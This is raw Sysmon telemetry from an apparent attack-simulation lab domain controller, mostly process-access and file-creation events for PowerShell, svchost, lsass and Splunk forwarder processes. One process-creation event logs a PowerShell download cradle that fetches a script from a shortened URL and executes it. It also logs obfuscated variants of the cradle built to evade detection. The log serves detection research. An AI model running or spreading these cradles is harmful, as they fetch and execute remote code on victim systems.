+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200353Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.192{5ABCFE62-99F1-603E-7907-00000000AD01}30803060C:\Windows\system32\csrss.exe{5ABCFE62-E654-6040-DA4D-00000000AD01}2716C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200352Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.192{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E654-6040-DA4D-00000000AD01}2716C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d1532a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d0a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c612e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5e82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d0a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5b4997(wow64) 154100x80000000000000002200351Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.202{5ABCFE62-E654-6040-DA4D-00000000AD01}2716C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000002200423Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.755{5ABCFE62-E655-6040-DE4D-00000000AD01}4524C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\Default_File_Path.ps12021-03-03 16:54:22.132 23542300x80000000000000002200422Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.739{5ABCFE62-E655-6040-DE4D-00000000AD01}4524ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\Default_File_Path.ps1MD5=DCE6250005968B2E1003165602177255,SHA256=4013A9DB2598C677B34A6C4753E91216B844C567D5110931647C38680DE03BAF,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002200421Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.458{5ABCFE62-E655-6040-DE4D-00000000AD01}4524C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\Default_File_Path.ps12021-03-03 16:54:22.132 23542300x80000000000000002200420Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.458{5ABCFE62-E655-6040-DE4D-00000000AD01}4524ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\Default_File_Path.ps1MD5=DCE6250005968B2E1003165602177255,SHA256=4013A9DB2598C677B34A6C4753E91216B844C567D5110931647C38680DE03BAF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200419Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.380{5ABCFE62-842F-603E-0F00-00000000AD01}2962228C:\Windows\system32\svchost.exe{5ABCFE62-E655-6040-DE4D-00000000AD01}4524C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200418Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.380{5ABCFE62-842F-603E-0F00-00000000AD01}2961296C:\Windows\system32\svchost.exe{5ABCFE62-E655-6040-DE4D-00000000AD01}4524C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002200417Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.364{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BCBEAC63B10CC27DB15FE4D8C21F6555,SHA256=556A924D8444D697109AF97E7A7795AB6A889074452A202ED33D16669EE20364,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200416Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.364{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DECA9A78875A51CD8FC7F499761D13BC,SHA256=17D7E5596EF094FED1F04FB4FACE8C5CD9EEC81F0E60228C6DCDBD3EC6553DAE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200415Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.349{5ABCFE62-842D-603E-0B00-00000000AD01}6321072C:\Windows\system32\lsass.exe{5ABCFE62-E655-6040-DE4D-00000000AD01}4524C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200414Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.349{5ABCFE62-842D-603E-0B00-00000000AD01}6321072C:\Windows\system32\lsass.exe{5ABCFE62-E655-6040-DE4D-00000000AD01}4524C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002200413Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-CreatePipe2021-03-04 13:53:25.333{5ABCFE62-E655-6040-DE4D-00000000AD01}4524\PSHost.132593396050321926.4524.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002200412Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.317{5ABCFE62-E655-6040-DE4D-00000000AD01}4524ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_lrdoshm5.jtt.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200411Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.317{5ABCFE62-E655-6040-DE4D-00000000AD01}4524ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_wj3xtxgw.cli.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002200410Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.302{5ABCFE62-E655-6040-DE4D-00000000AD01}4524C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_wj3xtxgw.cli.ps12021-03-04 13:53:25.302 23542300x80000000000000002200409Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.239{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C7DC332AEE09D94664656FDDFFC7F683,SHA256=683B78D6A04C6DB06CA0CF64446F80479107B468EF94ED93BAC61E137D1BEFF9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200408Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.067{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-E655-6040-DE4D-00000000AD01}4524C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200407Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.036{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E655-6040-DE4D-00000000AD01}4524C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF8172E9FF3) 10341000x80000000000000002200406Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.036{5ABCFE62-D502-6040-CE4B-00000000AD01}13763992C:\Windows\system32\conhost.exe{5ABCFE62-E655-6040-DE4D-00000000AD01}4524C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200405Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.021{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200404Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.021{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200403Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.021{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200402Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.021{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200401Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.021{5ABCFE62-99F1-603E-7907-00000000AD01}30802060C:\Windows\system32\csrss.exe{5ABCFE62-E655-6040-DE4D-00000000AD01}4524C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200400Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.021{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E655-6040-DE4D-00000000AD01}4524C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f3743(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f35b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c675de3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5ec19f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d0a5392(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c612e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5e82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c621471(wow64) 154100x80000000000000002200399Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.032{5ABCFE62-E655-6040-DE4D-00000000AD01}4524C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))) (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs() Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 